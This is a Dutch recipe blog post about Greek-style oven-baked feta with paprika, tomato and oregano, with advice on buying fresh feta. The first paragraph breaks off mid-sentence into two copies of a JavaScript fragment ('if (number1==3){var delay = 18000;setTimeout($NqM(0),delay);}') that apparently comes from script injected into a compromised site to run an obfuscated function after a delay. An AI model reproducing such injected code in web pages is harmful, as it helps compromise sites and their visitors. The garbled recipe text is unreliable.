Afgelopen zomer in Griekenland hebben we dit gerechtje meerdere keren besteld. Heerlijk met wat brood bij de borrel of als voorgerechtje. Ook terug in Nederland is deze Griekse klassieker nog steeds favoriet; heerlijk uit de oven met paprika, dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomaat en oregano.
Probeer eens verse feta
Voor feta geldt eigenlijk hetzelfde als mozzarella; er zijn echt heel veel verschillende soorten. Een goede tip voor dit gerecht is om een verse feta te gebruiken. Je kunt deze vaak krijgen bij Islamitische supermarkten of bij de versafdeling in de supermarkt. De smaak is vaak veel zachter en velen malen romiger dan de kant-en-klaar variant. Je kunt zelfs feta op basis van geitenmelk, maar ook op basis van koemelk krijgen. Probeer het zelf eens en proef het verschil.
Geen Reacties op "Feta op z'n Grieks uit de oven!"